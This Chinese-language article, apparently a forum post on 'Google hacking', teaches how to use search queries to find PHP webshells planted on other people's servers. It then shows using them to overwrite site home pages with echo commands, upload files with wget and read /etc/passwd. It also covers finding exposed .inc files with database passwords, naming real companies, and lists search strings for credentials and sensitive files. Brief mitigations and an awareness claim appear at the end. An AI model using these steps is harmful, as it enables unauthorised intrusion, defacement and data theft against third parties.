2004年在拉斯維加斯舉行的BlackHat大會上，有兩位安全專家分別作了名為You found that on google? 和google attacks 的主題演講。經(jīng)過安全焦點(diǎn)論壇原版主WLJ翻譯整理后，個(gè)人覺得有必要補(bǔ)充完善一些細(xì)節(jié)部分。今天向大家講述的是Google的又一功能：利用搜索引擎快速查找存在脆弱性的主機(jī)以及包含敏感數(shù)據(jù)的信息，甚至可以直接進(jìn)行傻瓜入侵。
　　用google來進(jìn)行“滲透測試”
　　我們今天滲透測試人員在實(shí)施攻擊之前，往往會先進(jìn)行信息搜集工作，而后才是漏洞確認(rèn)和最終的漏洞利用、擴(kuò)大戰(zhàn)果。在這里我們現(xiàn)在要談的是：
　　一、利用google查找被人安裝了php webshell后門的主機(jī)，并測試能否使用;
　　二、利用google查找暴露出來的INC敏感信息.
　　OK，現(xiàn)在我們開始：
　　1.查找利用php webshell
　　我們在google的搜索框中填入：
Code:
intitle:"php shell*" "Enable stderr" filetype:php
　　(注: intitle—網(wǎng)頁標(biāo)題 Enable stderr—UNIX標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯(cuò)誤的縮寫filetype—文件類型)。搜索結(jié)果中，你能找到很多直接在機(jī)器上執(zhí)行命令的web shell來。如果找到的PHPSHELL不會利用，如果你不熟悉UNIX，可以直接看看LIST，這里就不詳細(xì)說了，有很多利用價(jià)值。要說明的是，我們這里搜索出來的一些國外的PHPSHELL上都要使用UNIX命令，都是system調(diào)用出來的函數(shù)(其實(shí)用百度及其他搜索引擎都可以，只是填寫搜索的內(nèi)容不同)。通過我的檢測，這個(gè)PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:
Code:
echo "召喚" > index.jsp
　　在得到的
Code:
echo \
后再寫上:"召喚"
現(xiàn)在看看首頁，已經(jīng)被我們改成: "召喚" 了。
　　我們也可以用WGET上傳一個(gè)文件上去(比如你要替換的葉子吧)。然后execute Command輸入 cat file > index.html or echo "" > file
echo "test" >> file
這樣一條條打出來，站點(diǎn)首頁就成功被替換了。同樣的也可以
Code:
uname -a;cat /etc/passwd
不過有點(diǎn)要注意，有些WEBSHELL程序有問題，執(zhí)行不了的，比如:
http://***www.al3toof.com/card/smal ... c_html&command=
http://***ramsgaard.net/upload/shell.php
這些站的php是global register off 解決方案:
　　我們可以利用相關(guān)工具進(jìn)行在互聯(lián)網(wǎng)進(jìn)行搜索，如果有信息被濫用，到http://***www.google.com/remove.html提交你希望刪除的信息，控制搜索引擎機(jī)器人的查詢.
　　2.搜索INC敏感信息
　　我們在google的搜索框中填入:
Code:
.org filetype:inc
　　我們現(xiàn)在搜索的是org域名的站點(diǎn)的INC信息(因?yàn)間oogle屏蔽掉了搜索"COM"信息，我們還可以搜其他gov，cn，info，tw，jp，edu等等之類的)
　　PS:我在看許多PHP編程人員在編程時(shí)候，都喜歡把一些常寫的代碼或配置信息，寫在一個(gè).inc的文件中，如shared.inc、global.inc、conn.inc等等，當(dāng)然這是一個(gè)很好的習(xí)慣，包括PHP官方網(wǎng)站都是如此，但不知你有沒有注意到這里面含一個(gè)安全隱患問題。我有一次在寫一個(gè)PHP代碼時(shí)，無意中寫錯(cuò)了一句話，當(dāng)我在瀏覽器里查看此PHP文件時(shí)，竟然發(fā)現(xiàn)屏幕詳細(xì)的顯示了我所出錯(cuò)的PHP文件路徑及代碼行。(PHP錯(cuò)誤顯示配置是開著的.此功能在PHP里是默認(rèn)的!)，這就是說當(dāng)我們無意寫錯(cuò)代碼(同樣.inc文件也一樣) 或者PHP代碼解析出問題時(shí)，而PHP錯(cuò)誤顯示又是開著的，客戶端的用戶就會看到具體url地址的.inc文件，而.url文件如同txt文本一樣，當(dāng)在瀏覽器中瀏覽時(shí)，就毫無保留地顯示了它的內(nèi)容，而且不少站點(diǎn)在.inc文件寫了重要的信息如用戶密碼之類!包括國內(nèi)著名海爾公司以及嘉鈴摩托公司，我之所以敢公布是因?yàn)槲冶救藴y試過，http://***www.haier.com/su ***/inc/conn.inc 暴出的數(shù)據(jù)庫ID密碼用客戶端連不上去，網(wǎng)站關(guān)閉了1215，而且防火墻也過濾掉了。
　　INC的知識說完后，我們繼續(xù)又搜索到了好多，找到一個(gè)暴露了MYSQL口令的，我們又可以用客戶端登陸上去修改數(shù)據(jù)了。這里涉及到數(shù)據(jù)庫的知識，我們不談太多，關(guān)于"INC暴露敏感信息"就到這里結(jié)束吧；當(dāng)然我們可以通過一些辦法解決：
　　1，你可以專門對.inc文件進(jìn)行配置，避免用戶直接獲取源文件。
　　2，當(dāng)然比較好的方法是，加上并且改文件擴(kuò)展名為.php（PHP可以解析的擴(kuò)展名），這樣客戶端就不會獲取源文件了。
　　這里，我將FreeMind繪制的圖片用文本表示了。
　　有關(guān)Google Hack的詳細(xì)信息，幫助我們分析踩點(diǎn)
　　連接符:
Code:
- : . * │
　　操作符:
Code:
"foo1 foo2"
filetype:123
site:foo.com
intext:foo
intitle:footitle
allinurl:foo 密碼相關(guān)
Code:
：“index of”
htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd (frontpage)
　　敏感信息：
Code:
"robots.tx"
"disallow:"
filetype:txt
inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:phpsysinfo
ipsec filetype:conf
intitle:"error occurred" odbc request where (select│insert)
"mydomain.com" nessus report
"report generated by"
　　結(jié)尾:
　　如果要拿ROOT權(quán)限就要具體問題具體分析了，不過有了SHELL權(quán)限就好提了，網(wǎng)上有很多根據(jù)WEBSHELL提升權(quán)限的文章大家可以參照一下。
　　通過google我們還可以搜索到很多有用的東西，不過是細(xì)節(jié)，要通過信息收集慢慢分析、擴(kuò)大、進(jìn)行入侵.這些我就不具體分析了。給大家個(gè)思路，大家慢慢研究好了到這里，這篇文章就要結(jié)束了，寫這篇文章的目的是為了引起大家的關(guān)注與重視，了解新的HACK手段，了解新的防護(hù)方法，事物都有兩面性，在當(dāng)今Google盛行的時(shí)代，在充分利用google的同時(shí).也應(yīng)該看得更全面。

最新評論